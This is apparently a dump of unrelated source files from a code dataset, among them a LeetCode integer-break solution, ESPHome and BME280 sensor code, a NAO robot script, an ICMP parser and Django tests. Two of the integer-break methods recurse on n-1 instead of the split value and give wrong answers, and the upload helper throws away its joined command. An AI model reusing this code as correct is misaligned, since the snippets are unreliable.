python\n# -*- coding:utf-8 -*-\n# @datetime:2019/1/15 18:53\n\n\"\"\"\nGiven a positive integer n, break it into the sum of at least two positive integers and maximize the product of those integers.\n Return the maximum product you can get.\n\nExample 1:\n\nInput: 2\nOutput: 1\nExplanation: 2 = 1 + 1, 1 × 1 = 1.\nExample 2:\n\nInput: 10\nOutput: 36\nExplanation: 10 = 3 + 3 + 4, 3 × 3 × 4 = 36.\nNote: You may assume that n is not less than 2 and not larger than 58.\n\"\"\"\n\n\nclass Solution:\n def integerBreak(self, n):\n \"\"\"\n 将n进行分割(至少分割两部分), 可以获得的最大乘积\n :type n: int\n :rtype: int\n \"\"\"\n if n == 1:\n return 1\n res = -1\n for i in range(1, n):\n res = max(res, i * (n - 1), i * self.integerBreak(n - 1))\n return res\n\n def integerBreakV1(self, n):\n \"\"\"\n 将n进行分割(至少分割两部分), 可以获得的最大乘积\n :type n: int\n :rtype: int\n \"\"\"\n mem = [-1 for _ in range(n + 1)]\n if n == 1:\n return 1\n if mem[n] != -1:\n return mem[n]\n\n res = -1\n for i in range(1, n):\n res = max(res, i * (n - 1), i * self.integerBreak(n - 1))\n mem[n] = res\n return res\n\n def integerBreakV2(self, n):\n \"\"\"\n 将n进行分割(至少分割两部分), 可以获得的最大乘积\n :type n: int\n :rtype: int\n \"\"\"\n # DP\n mem = [-1 for _ in range(n + 1)] # mem[i] 表示将数字i分割(至少分割成两部分)后得到的最大乘积\n mem[1] = 1\n for i in range(2, n + 1):\n # 求解mem[i]\n for j in range(1, i):\n # j + (i-j) 两个部分\n mem[i] = max(mem[i], j * (i - j), j * mem[i - j])\n return mem[n]\n","sub_path":"leetcode/343. Integer Break.py","file_name":"343. Integer Break.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"602696532","text":"import voluptuous as vol\n\nimport esphomeyaml.config_validation as cv\nfrom esphomeyaml import core\nfrom esphomeyaml.components import sensor\nfrom esphomeyaml.const import CONF_ADDRESS, CONF_GAS_RESISTANCE, CONF_HUMIDITY, CONF_IIR_FILTER, \\\n CONF_MAKE_ID, CONF_NAME, CONF_OVERSAMPLING, CONF_PRESSURE, CONF_TEMPERATURE, \\\n CONF_UPDATE_INTERVAL, CONF_HEATER, CONF_DURATION\nfrom esphomeyaml.helpers import App, Application, add, variable\n\nDEPENDENCIES = ['i2c']\n\nOVERSAMPLING_OPTIONS = {\n 'NONE': sensor.sensor_ns.BME680_OVERSAMPLING_NONE,\n '1X': sensor.sensor_ns.BME680_OVERSAMPLING_1X,\n '2X': sensor.sensor_ns.BME680_OVERSAMPLING_2X,\n '4X': sensor.sensor_ns.BME680_OVERSAMPLING_4X,\n '8X': sensor.sensor_ns.BME680_OVERSAMPLING_8X,\n '16X': sensor.sensor_ns.BME680_OVERSAMPLING_16X,\n}\n\nIIR_FILTER_OPTIONS = {\n 'OFF': sensor.sensor_ns.BME680_IIR_FILTER_OFF,\n '1X': sensor.sensor_ns.BME680_IIR_FILTER_1X,\n '3X': sensor.sensor_ns.BME680_IIR_FILTER_3X,\n '7X': sensor.sensor_ns.BME680_IIR_FILTER_7X,\n '15X': sensor.sensor_ns.BME680_IIR_FILTER_15X,\n '31X': sensor.sensor_ns.BME680_IIR_FILTER_31X,\n '63X': sensor.sensor_ns.BME680_IIR_FILTER_63X,\n '127X': sensor.sensor_ns.BME680_IIR_FILTER_127X,\n}\n\nBME680_OVERSAMPLING_SENSOR_SCHEMA = sensor.SENSOR_SCHEMA.extend({\n vol.Optional(CONF_OVERSAMPLING): vol.All(vol.Upper, cv.one_of(*OVERSAMPLING_OPTIONS)),\n})\n\nMakeBME680Sensor = Application.MakeBME680Sensor\n\nPLATFORM_SCHEMA = sensor.PLATFORM_SCHEMA.extend({\n cv.GenerateID(CONF_MAKE_ID): cv.declare_variable_id(MakeBME680Sensor),\n vol.Optional(CONF_ADDRESS, default=0x76): cv.i2c_address,\n vol.Required(CONF_TEMPERATURE): cv.nameable(BME680_OVERSAMPLING_SENSOR_SCHEMA),\n vol.Required(CONF_PRESSURE): cv.nameable(BME680_OVERSAMPLING_SENSOR_SCHEMA),\n vol.Required(CONF_HUMIDITY): cv.nameable(BME680_OVERSAMPLING_SENSOR_SCHEMA),\n vol.Required(CONF_GAS_RESISTANCE): cv.nameable(sensor.SENSOR_SCHEMA),\n vol.Optional(CONF_IIR_FILTER): vol.All(vol.Upper, cv.one_of(*IIR_FILTER_OPTIONS)),\n vol.Optional(CONF_HEATER): vol.Any(None, vol.All(vol.Schema({\n vol.Optional(CONF_TEMPERATURE, default=320): vol.All(vol.Coerce(int), vol.Range(200, 400)),\n vol.Optional(CONF_DURATION, default='150ms'): vol.All(\n cv.positive_time_period_milliseconds, vol.Range(max=core.TimePeriod(milliseconds=4032)))\n }, cv.has_at_least_one_key(CONF_TEMPERATURE, CONF_DURATION)))),\n vol.Optional(CONF_UPDATE_INTERVAL): cv.update_interval,\n})\n\n\ndef to_code(config):\n rhs = App.make_bme680_sensor(config[CONF_TEMPERATURE][CONF_NAME],\n config[CONF_PRESSURE][CONF_NAME],\n config[CONF_HUMIDITY][CONF_NAME],\n config[CONF_GAS_RESISTANCE][CONF_NAME],\n config[CONF_ADDRESS],\n config.get(CONF_UPDATE_INTERVAL))\n make = variable(config[CONF_MAKE_ID], rhs)\n bme680 = make.Pbme680\n if CONF_OVERSAMPLING in config[CONF_TEMPERATURE]:\n constant = OVERSAMPLING_OPTIONS[config[CONF_TEMPERATURE][CONF_OVERSAMPLING]]\n add(bme680.set_temperature_oversampling(constant))\n if CONF_OVERSAMPLING in config[CONF_PRESSURE]:\n constant = OVERSAMPLING_OPTIONS[config[CONF_PRESSURE][CONF_OVERSAMPLING]]\n add(bme680.set_pressure_oversampling(constant))\n if CONF_OVERSAMPLING in config[CONF_HUMIDITY]:\n constant = OVERSAMPLING_OPTIONS[config[CONF_HUMIDITY][CONF_OVERSAMPLING]]\n add(bme680.set_humidity_oversampling(constant))\n if CONF_IIR_FILTER in config:\n constant = IIR_FILTER_OPTIONS[config[CONF_IIR_FILTER]]\n add(bme680.set_iir_filter(constant))\n if CONF_HEATER in config:\n conf = config[CONF_HEATER]\n if not conf:\n add(bme680.set_heater(0, 0))\n else:\n add(bme680.set_heater(conf[CONF_TEMPERATURE], conf[CONF_DURATION]))\n\n sensor.setup_sensor(bme680.Pget_temperature_sensor(), make.Pmqtt_temperature,\n config[CONF_TEMPERATURE])\n sensor.setup_sensor(bme680.Pget_pressure_sensor(), make.Pmqtt_pressure,\n config[CONF_PRESSURE])\n sensor.setup_sensor(bme680.Pget_humidity_sensor(), make.Pmqtt_humidity,\n config[CONF_HUMIDITY])\n sensor.setup_sensor(bme680.Pget_gas_resistance_sensor(), make.Pmqtt_gas_resistance,\n config[CONF_GAS_RESISTANCE])\n\n\nBUILD_FLAGS = '-DUSE_BME680'\n","sub_path":"esphomeyaml/components/sensor/bme680.py","file_name":"bme680.py","file_ext":"py","file_size_in_byte":4484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"80981502","text":"#!/usr/bin/env python\n# -*- encoding: UTF-8 -*-\n\n\n\nimport qi\nimport argparse\nimport sys\nimport time\nimport math\n\n\n\n\n\ndef main(session):\n\n\n motion_service = session.service(\"ALMotion\")\n \n motion_service.setStiffnesses(\"LArm\", 1.0)\n motion_service.setStiffnesses(\"RArm\", 1.0)\n motion_service.setMoveArmsEnabled(False,False) \n\n \n\n\n names = [\"LShoulderPitch\",\"RShoulderPitch\"] \n angles = [math.radians(10),math.radians(10)]\n fractionMaxSpeed = 0.2\n motion_service.setAngles(names, angles, fractionMaxSpeed)\n time.sleep(5)\n\n names = [\"LElbowRoll\",\"RElbowRoll\"] \n angles = [math.radians(-60),math.radians(60)]\n fractionMaxSpeed = 0.2\n motion_service.setAngles(names, angles, fractionMaxSpeed)\n time.sleep(5)\n\n names = [\"LShoulderRoll\",\"RShoulderRoll\"] \n angles = [math.radians(40),math.radians(-40)]\n fractionMaxSpeed = 0.2\n motion_service.setAngles(names, angles, fractionMaxSpeed)\n time.sleep(5)\n\n\n names = [\"LElbowYaw\",\"RElbowYaw\"] \n angles = [math.radians(0),math.radians(0)]\n fractionMaxSpeed = 0.2\n motion_service.setAngles(names, angles, fractionMaxSpeed)\n time.sleep(5)\n\n names = [\"LWristYaw\",\"RWristYaw\"] \n angles = [math.radians(-90),math.radians(90)]\n fractionMaxSpeed = 0.2\n motion_service.setAngles(names, angles, fractionMaxSpeed)\n time.sleep(5)\n \n \n\n \n\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--ip\", type=str, default=\"172.18.33.122\",\n help=\"Robot IP address. On robot or Local Naoqi: use '172.18.33.122'.\")\n parser.add_argument(\"--port\", type=int, default=9559,\n help=\"Naoqi port number\")\n\n args = parser.parse_args()\n session = qi.Session()\n \n\n try:\n session.connect(\"tcp://\" + args.ip + \":\" + str(args.port))\n except RuntimeError:\n print (\"Can't connect to Naoqi at ip \\\"\" + args.ip + \"\\\" on port \" + str(args.port) +\".\\n\"\n \"Please check your script arguments. Run with -h option for help.\")\n sys.exit(1)\n main(session)\n","sub_path":"importantPythonScripts/prepararTomarBotella.py","file_name":"prepararTomarBotella.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"272176122","text":"import os\n\n\ndef getUploadCommand(basedir, prefix, suffix):\n\n listDir = filter(os.path.isdir, os.listdir(basedir))\n\n command = []\n for subdir in listDir:\n command.append('cd {0}'.format(basedir))\n command.append('tar -cf {1}-{0}-{2}.tar'.format(subdir, prefix, suffix))\n command.append('gzip {1}-{0}-{2}.tar'.format(subdir, prefix, suffix))\n command.append(\n 'gsutil cp {1}-{0}-{2}.tar.gz gs://mortner-store/'.format(subdir, prefix, suffix))\n\n ';'.join(command)\n\n return command\n","sub_path":"templates/compressAndUploadFiles.py","file_name":"compressAndUploadFiles.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"28390966","text":"import socket, sys, time, platform, struct\nfrom PyQt4 import QtGui, QtCore\n\ndef icmp(self, packet, extractedAttIndex, printKey):\n\t\t# Header lengths.\n\t\tethHeaderLength = 14\n\t\tip_hlen = 20\n\t\ticmpHeaderLength = 8\n\t\t\n\t\t# Get ICMP header using begin and end.\n\t\t# Specific Linux and Windows calibration is needed.\n\t\tif self.os == self.windows:\n\t\t\tbegin = ip_hlen\n\t\t\tend = begin + icmpHeaderLength\n\t\ticmpHeader = packet[begin:end]\n\n\t\t# Unpack the header because it originally in hex.\n\t\t# The regular expression helps unpack the header.\n\t\t# ! signifies we are unpacking a network endian.\n\t\t# B signifies we are unpacking an integer of size 1 byte.\n\t\t# H signifies we are unpacking an integer of size 2 bytes.\n\t\t# L signifies we are unpacking a long of size 4 bytes.\n\t\ticmpHeaderUnpacked = struct.unpack('!BBHL', icmpHeader)\n\n\t\t# The first B is 1 byte and contains the type.\n\t\ticmpType = icmpHeaderUnpacked[0]\n\n\t\t# The second B is 1 byte and contains the code.\n\t\ticmpCode = icmpHeaderUnpacked[1]\n\n\t\t# The first H is 2 bytes and contains the checksum.\n\t\ticmpChecksum = icmpHeaderUnpacked[2]\n\n\t\t# Check if the type is 1 or 8, if so, unpack the identifier and sequence number.\n\t\tif (icmpType == 0) or (icmpType == 8):\n\t\t\t# The first L is 4 bytes and contains the rest of the header.\n\t\t\ticmpIdentifier = icmpHeaderUnpacked[3] >> 16\n\t\t\ticmpSeqNumber = icmpHeaderUnpacked[3] & 0xFFFF\n\t\t\n\t\t# Check if the print key is True.\n\t\t# If true, header information will be printed.\n\t\t# \tCheck if the user selected extracted attribute index is 0.\n\t\t#\tIf true, all attributes will be printed.\n\t\t#\tIf false, the attribute the user selected extracted attribute index corresponds to will be printed.\n\t\t# If false, the attribute the user selected attribute index corresponds to will be returned.\n\t\tif printKey == True:\n\t\t\tif (icmpType == 0) or (icmpType == 8):\n\t\t\t\t# Print ICMP Header\n\t\t\t\t# Some segments of the header are switched back to hex form because that\n\t\t\t\t# \tis the format wireshark has it.\n\t\t\t\tself.unpackedInfo.append('\\n********************\\n******* ICMP *******\\n********************')\n\t\t\t\t\n\t\t\t\tif (extractedAttIndex == 1) or (extractedAttIndex == 0):\n\t\t\t\t\tself.unpackedInfo.append('Type: ' + str(icmpType))\n\t\t\t\tif (extractedAttIndex == 2) or (extractedAttIndex == 0):\n\t\t\t\t\tself.unpackedInfo.append('Code: ' + str(icmpCode))\n\t\t\t\tif (extractedAttIndex == 3) or (extractedAttIndex == 0):\n\t\t\t\t\tself.unpackedInfo.append('Checksum: ' + format(icmpChecksum, '#04X'))\n\t\t\t\tif (extractedAttIndex == 4) or (extractedAttIndex == 0):\n\t\t\t\t\tself.unpackedInfo.append('Identifier: ' + str(icmpIdentifier))\n\t\t\t\tif (extractedAttIndex == 5) or (extractedAttIndex == 0):\n\t\t\t\t\tself.unpackedInfo.append('Sequence Number: ' + str(icmpSeqNumber))\n\t\t\telse:\n\t\t\t\tself.unpackedInfo.append('\\n********************\\n******* ICMP *******\\n********************')\n\t\t\t\t\n\t\t\t\tif (extractedAttIndex == 1) or (extractedAttIndex == 0):\n\t\t\t\t\tself.unpackedInfo.append('Type: ' + str(icmpType))\n\t\t\t\tif (extractedAttIndex == 2) or (extractedAttIndex == 0):\n\t\t\t\t\tself.unpackedInfo.append('Code: ' + str(icmpCode))\n\t\t\t\tif (extractedAttIndex == 3) or (extractedAttIndex == 0):\n\t\t\t\t\tself.unpackedInfo.append('Checksum: ' + format(icmpChecksum, '#04X'))\n\t\t\t\tif (extractedAttIndex == 4) or (extractedAttIndex == 0):\n\t\t\t\t\tself.unpackedInfo.append('Attribute not available.')\n\t\t\t\tif (extractedAttIndex == 5) or (extractedAttIndex == 0):\n\t\t\t\t\tself.unpackedInfo.append('Attribute not available.')\n\t\t\t\t\t\n\t\t\t# Separator\t\n\t\t\tself.unpackedInfo.append('\\n----------------------------------------')\n\t\telse:\n\t\t\tif (icmpType == 0) or (icmpType == 8):\n\t\t\t\tif (extractedAttIndex == 1):\n\t\t\t\t\treturn str(icmpType)\n\t\t\t\tif (extractedAttIndex == 2):\n\t\t\t\t\treturn str(icmpCode)\n\t\t\t\tif (extractedAttIndex == 3):\n\t\t\t\t\treturn format(icmpChecksum, '#04X')\n\t\t\t\tif (extractedAttIndex == 4):\n\t\t\t\t\treturn str(icmpIdentifier)\n\t\t\t\tif (extractedAttIndex == 5):\n\t\t\t\t\treturn str(icmpSeqNumber)\n\t\t\telse:\t\t\t\n\t\t\t\tif (extractedAttIndex == 1):\n\t\t\t\t\treturn str(icmpType)\n\t\t\t\tif (extractedAttIndex == 2):\n\t\t\t\t\treturn str(icmpCode)\n\t\t\t\tif (extractedAttIndex == 3):\n\t\t\t\t\treturn format(icmpChecksum, '#04X')\n\t\t\t\tif (extractedAttIndex == 4):\n\t\t\t\t\treturn 'Attribute not available.'\n\t\t\t\tif (extractedAttIndex == 5):\n\t\t\t\t\treturn 'Attribute not available.'","sub_path":"icmp.py","file_name":"icmp.py","file_ext":"py","file_size_in_byte":4241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"614387834","text":"# coidng=utf-8\nimport os, time\nfrom appium import webdriver\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom app.common.Swipe_swipe import *\nfrom app.page import get_yaml\npage_loc = get_yaml.LonginPage()\nmin_loc = get_yaml.MinePage()\nzhuce_loc = get_yaml.ZhucePage()\nclass Fengzhuang(object):\n def lunachapp(self):\n desired_caps = {\n 'platformName': 'Android',\n 'deviceName': 'X2P5T16114009484',\n 'platformVersion': '5.1',\n 'appPackage': 'gz.lifesense.weidong.qa',\n 'appActivity': 'gz.lifesense.weidong.ui.activity.main.LaunchActivity',\n 'unicodeKeyboard': True,\n 'resetKeyboard': True,\n # 'automationName': 'Uiautomator2'\n }\n self.dr = webdriver.Remote(\"http://127.0.0.1:4723/wd/hub\", desired_caps)\n time.sleep(3)\n return self.dr\n\n def find_element(self, locator,timeout=3):\n element = WebDriverWait(self.dr, timeout, 0.5).until(EC.presence_of_element_located(locator))\n return element\n\n def find_elements(self, locator,timeout=3):\n elements = WebDriverWait(self.dr, timeout, 0.5).until(EC.presence_of_all_elements_located(locator))\n return elements\n\n def click(self, locator):\n element = self.find_element(locator)\n element.click()\n\n def clear_key(self, locator):\n element = self.find_element(locator)\n element.clear()\n\n def send_keys(self, locator, text):\n element = self.find_element(locator)\n element.clear()\n element.send_keys(text)\n\n def get_text(self,locator):\n element = self.find_element(locator)\n return element.text\n\n\n def tan_chuan(self):\n ivclose_loc = ('id', 'gz.lifesense.weidong.qa:id/ivDialogClose')\n try:\n self.dr.wait_activity('gz.lifesense.weidong.ui.activity.main.MainActivityNew', 1)\n self.click(ivclose_loc)\n print('首页弹窗已关闭')\n except:\n pass\n\n def always_allow(self, number=3):\n for i in range(number):\n loc = (\"xpath\", \"//*[@text='允许']\")\n try:\n e = WebDriverWait(self.dr, 1, 0.5).until(EC.presence_of_element_located(loc))\n e.click()\n except:\n pass\n\n def is_toast_exist(self, text, timeout=2, poll_frequency=0.1):\n try:\n toast_loc = ('xpath', \"//*[contains(@text,'%s')]\" % text)\n if WebDriverWait(self.dr, timeout, poll_frequency).until(EC.presence_of_element_located(toast_loc)):\n return True\n except:\n return False\n\n def screen_shot(self, text):\n base_path = os.path.abspath(os.path.join(os.path.dirname(__file__), \"..\"))\n img_path = os.path.join(base_path, 'report\\\\img\\\\')\n # print(img_path)\n times = time.strftime('%Y%m%d%H%M', time.localtime(time.time()))\n screen_save_path = img_path + times + text + '.png'\n # print(screen_save_path)\n self.dr.get_screenshot_as_file(screen_save_path)\n\n\nif __name__ == '__main__':\n a = Fengzhuang()\n a.screen_shot('ss')\n","sub_path":"app/common/fengzhuang.py","file_name":"fengzhuang.py","file_ext":"py","file_size_in_byte":3193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"152418456","text":"from django.test import TestCase\nfrom django.test.client import Client\nfrom django.contrib.auth.models import User\nfrom django.core.urlresolvers import reverse\n\nfrom website.apps.core.models import Language, Source\nfrom website.apps.lexicon.models import Lexicon\nfrom website.apps.pronouns.models import Paradigm, PronounType, Pronoun\nfrom website.apps.pronouns.tools import full_repr_row\n\nfrom website.apps.pronouns.tests import DefaultSettingsMixin\n\n\nclass Test_Paradigm(DefaultSettingsMixin, TestCase):\n def setUp(self):\n self.add_fixtures()\n \n def test_repr_no_label(self):\n assert unicode(self.pdm) == 'A'\n\n def test_repr_with_label(self):\n self.pdm.label = 'test'\n self.pdm.save()\n assert unicode(self.pdm) == 'A: test'\n \n def test_have_some_pronoun_types(self):\n assert self.pdm.pronoun_set.count() == 3\n \n def test_prefill(self):\n # make sure the correct number of pronouns is there..\n assert self.pdm.pronoun_set.count() == len(PronounType._generate_all_combinations())\n \n # check the pronouns themselves...\n for comb in PronounType._generate_all_combinations():\n queryset = Pronoun.objects.filter(pronountype=comb)\n assert len(queryset) == 1, 'Got {0} not one'.format(len(queryset))\n \n \n def test_partial_prefill(self):\n # we should have a full complement. \n assert self.pdm.pronoun_set.count() == len(PronounType._generate_all_combinations())\n \n # Let's delete some...\n for pron in self.pdm.pronoun_set.all():\n if pron.pronountype.person == '2':\n pron.delete()\n else:\n # modify the stored entries so we can identify them later.\n pron.entries.add(Lexicon.objects.create(\n editor=self.editor, \n source=self.source,\n language=self.lang,\n word=self.word,\n entry=\"old\"\n ))\n pron.save()\n \n # how many should we have deleted\n missing = [_ for _ in PronounType ._generate_all_combinations() if _.person == '2']\n assert len(missing) == 1\n assert self.pdm.pronoun_set.count() == (len(PronounType._generate_all_combinations()) - len(missing))\n \n # re-run prefill\n self.pdm._prefill_pronouns()\n \n # we should now have a full complement again.\n assert self.pdm.pronoun_set.count() == len(PronounType._generate_all_combinations())\n \n for pron in self.pdm.pronoun_set.all():\n if pron.pronountype.person == '2':\n assert pron.entries.count() == 0\n else:\n assert pron.entries.count() == 1\n assert pron.entries.all()[0].entry == 'old'\n \n","sub_path":"website/website/apps/pronouns/tests/test_paradigm.py","file_name":"test_paradigm.py","file_ext":"py","file_size_in_byte":2873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"344278993","text":"# -*- coding: utf-8 -*-\n\nfrom webcam.Webcam import Webcam\nfrom facedetect.Detect import Detect\nfrom compare.Compare import Compare\nimport cv2\n\n\ndef main():\n previous_frame = None\n while True:\n webcam = Webcam()\n frame_resized_grayscale = webcam.captureImage()\n \n if previous_frame != None:\n min_area=(3000/800)*frame_resized_grayscale.shape[1]\n temp=background_subtraction(previous_frame, frame_resized_grayscale, min_area)\n if temp==1:\n detect = Detect()\n detect.detect_faces()\n else:\n print(\"Frame is skipped\")\n \n previous_frame = frame_resized_grayscale\n else:\n detect = Detect()\n detect.detect_faces()\n compare = Compare()\n compare.compareImages()\n \n key = cv2.waitKey(1) & 0xFF\n if key == ord(\"q\"):\n break\n\n\nif __name__ == \"__main__\":\n main()\n \ndef background_subtraction(previous_frame, frame_resized_grayscale, min_area):\n\t\"\"\"\n\tThis function returns 1 for the frames in which the area \n\tafter subtraction with previous frame is greater than minimum area\n\tdefined. \n\tThus expensive computation of human detection face detection \n\tand face recognition is not done on all the frames.\n\tOnly the frames undergoing significant amount of change (which is controlled min_area)\n\tare processed for detection and recognition.\n\t\"\"\"\n\tframeDelta = cv2.absdiff(previous_frame, frame_resized_grayscale)\n\tthresh = cv2.threshold(frameDelta, 25, 255, cv2.THRESH_BINARY)[1]\n\tthresh = cv2.dilate(thresh, None, iterations=2)\n\tim2, cnts, hierarchy = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\ttemp=0\n\tfor c in cnts:\n\t\t# if the contour is too small, ignore it\n\t\tif cv2.contourArea(c) > min_area:\n\t\t\ttemp=1\n\treturn temp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"591963059","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.home, name=\"home_page\"),\n path(\"new_task/\", views.new_task, name=\"new_task\"),\n path(\"task_update/\", views.task_update, name=\"task_update\"),\n path(\"task_view//\", views.task_view, name=\"task_view\"),\n path(\"task_delete//\", views.task_delete, name=\"task_delete\")\n]","sub_path":"django_todo/to_do/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"111217024","text":"\"\"\"\nTic-Tac-Toe, sometimes also known as Xs and Os, is a game for two players \n(X and O) who take turns marking the spaces in a 3×3 grid. The player who \nsucceeds in placing three respective marks in a horizontal, vertical, or \ndiagonal rows (NW-SE and NE-SW) wins the game.\n\nBut we will not be playing this game. You will be the referee for this games \nresults. You are given a result of a game and you must determine if the game \nends in a win or a draw as well as who will be the winner. Make sure to return \n\"X\" if the X-player wins and \"O\" if the O-player wins. If the game is a draw, \nreturn \"D\".\n\nA game's result is presented as a list of strings, where \"X\" and \"O\" are \nplayers' marks and \".\" is the empty cell.\n\nInput: A game result as a list of strings (unicode).\nOutput: \"X\", \"O\" or \"D\" as a string.\nPrecondition:\nThere is either one winner or a draw.\nlen(game_result) == 3\nall(len(row) == 3 for row in game_result)\n\"\"\"\n\ndef checkio(game_result):\n for row in range(3): #checking rows\n for a in (\"X\", \"O\"):\n if game_result[row].count(a) == 3:\n return a\n for column in range(3): #checking columns\n if (game_result[0][column] == game_result[1][column] == game_result[2][column]):\n if game_result[0][column] != \".\":\n return game_result[0][column]\n if ((game_result[1][1] == game_result[0][0] == game_result[2][2]) or\n (game_result[1][1] == game_result[0][2] == game_result[2][0])):\n if game_result[1][1] != \".\":\n return game_result[1][1]\n return \"D\"\n\nif __name__ == '__main__':\n #These \"asserts\" using only for self-checking and not necessary for auto-testing\n assert checkio([\n \"X.O\",\n \"XX.\",\n \"XOO\"]) == \"X\", \"Xs wins\"\n assert checkio([\n \"OO.\",\n \"XOX\",\n \"XOX\"]) == \"O\", \"Os wins\"\n assert checkio([\n \"OOX\",\n \"XXO\",\n \"OXX\"]) == \"D\", \"Draw\"\n assert checkio([\n \"O.X\",\n \"XX.\",\n \"XOO\"]) == \"X\", \"Xs wins again\"\n print(\"Coding complete? Click 'Check' to review your tests and earn cool rewards!\")\n\n","sub_path":"py.checkio/1.Home/4.Xs and Os Referee.py","file_name":"4.Xs and Os Referee.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"506069181","text":"import smbus2\nimport bme280\n\nport = 1\naddress = 0x77\nbus = smbus2.SMBus(port)\n\ncalibration_params = bme280.load_calibration_params(bus, address)\n\ndata = bme280.sample(bus, address, calibration_params)\n\nprint(data.id)\nprint(data.timestamp)\nprint(data.temperature)\n\nprint(data)\n\n\n\n\n\n\n\n\n","sub_path":"bme280/drew.py","file_name":"drew.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"155891227","text":"from setuptools import setup\n\nwith open(\"README.txt\") as f:\n long_description = f.read()\n\nsetup(\n name='ChessCalc',\n version='0.0.1',\n long_description=long_description,\n description='Tournament and league chess manager.',\n license=\"MIT\",\n author='Greg Denyes',\n author_email='Greg.Denyes@gmail.com',\n packages=['ChessCalc'],\n install_requires=[\n 'tkinter',\n 'sqlite3',\n ],\n package_data=['chess.db'],\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: Win',\n ]\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"236966292","text":"#########################################################\n# By Phil Procida #\n#########################################################\nimport random, enchant\n\nwordSuggest = enchant.Dict(\"en_US\")\n\nconsList = ['q','w','r','t','y',\n 'p','s','d','f','g',\n 'h','j','k','l','z',\n 'x','c','v','b','n',\n 'm']\nvowelList = ['a','e','i','o','u']\n\noriginalString = list(input(\"Enter some text: \"))\n\ndef randomChars(uInput):\n stepThru = 0\n while stepThru < len(uInput):\n for x in range(len(uInput)):\n if uInput[x] == ' ':\n stepThru += 1\n elif uInput[x] in vowelList:\n randomAssignChar = random.choice(consList)\n uInput[x] = randomAssignChar\n stepThru += 1\n elif uInput[x] in consList:\n randomAssignChar = random.choice(vowelList)\n uInput[x] = randomAssignChar\n stepThru += 1\n else:\n stepThru += 1\n removeExtra = 0\n while removeExtra < len(uInput):\n newString = ''\n for x in range(len(uInput)):\n newString = newString + uInput[x]\n removeExtra += 1\n return newString\n\nrandomCharString = randomChars(originalString)\n\ndef breakString(uInput):\n randomCharString = uInput.split()\n stepThru = 0\n newWordList = ''\n while stepThru < len(randomCharString):\n for x in range(len(randomCharString)):\n newWord = wordSuggest.suggest(randomCharString[x])\n if stepThru == 0:\n newWordList = newWord[0]\n stepThru+= 1\n else:\n newWordList = newWordList + ' ' + newWord[0]\n stepThru += 1\n return newWordList\n\ntry:\n finalString = breakString(randomCharString)\n print(\"Randomly rolled string(s): \" + str(randomCharString))\n print(\"New output(s): \" + str(finalString))\nexcept IndexError:\n print(\"PyEnchant could not find words similar to all of the rolled strings. Please try again.\")\n","sub_path":"gibberish machine.py","file_name":"gibberish machine.py","file_ext":"py","file_size_in_byte":2079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"334310983","text":"import boto3\nfrom cloudlift.exceptions import UnrecoverableException\n\nfrom cloudlift.config import EnvironmentConfiguration\nfrom cloudlift.config.logging import log_err\n\ndef get_region_for_environment(environment):\n if environment:\n return EnvironmentConfiguration(environment).get_config()[environment]['region']\n else:\n # Get the region from the AWS credentials used to execute cloudlift\n aws_session = boto3.session.Session()\n return aws_session.region_name\n\n\ndef get_client_for(resource, environment):\n return boto3.session.Session(\n region_name=get_region_for_environment(environment)\n ).client(resource)\n\n\ndef get_resource_for(resource, environment):\n return boto3.session.Session(\n region_name=get_region_for_environment(environment)\n ).resource(resource)\n\n\ndef get_notifications_arn_for_environment(environment):\n try:\n return EnvironmentConfiguration(\n environment\n ).get_config()[environment]['environment'][\"notifications_arn\"]\n except KeyError:\n raise UnrecoverableException(\"Unable to find notifications arn for {environment}\".format(**locals()))\n\n\ndef get_ssl_certification_for_environment(environment):\n try:\n return EnvironmentConfiguration(\n environment\n ).get_config()[environment]['environment'][\"ssl_certificate_arn\"]\n except KeyError:\n raise UnrecoverableException(\"Unable to find ssl certificate for {environment}\".format(**locals()))\n","sub_path":"cloudlift/config/region.py","file_name":"region.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"132326102","text":"import matplotlib.pyplot as plt\nfrom PIL import Image\n\nfrom vietocr.tool.predictor import Predictor\nfrom vietocr.tool.config import Cfg\nimport cv2\n\n\nclass OCR:\n def __init__(self,config_name=\"vgg_transformer\"):\n config = Cfg.load_config_from_name(config_name)\n # config['weights'] = 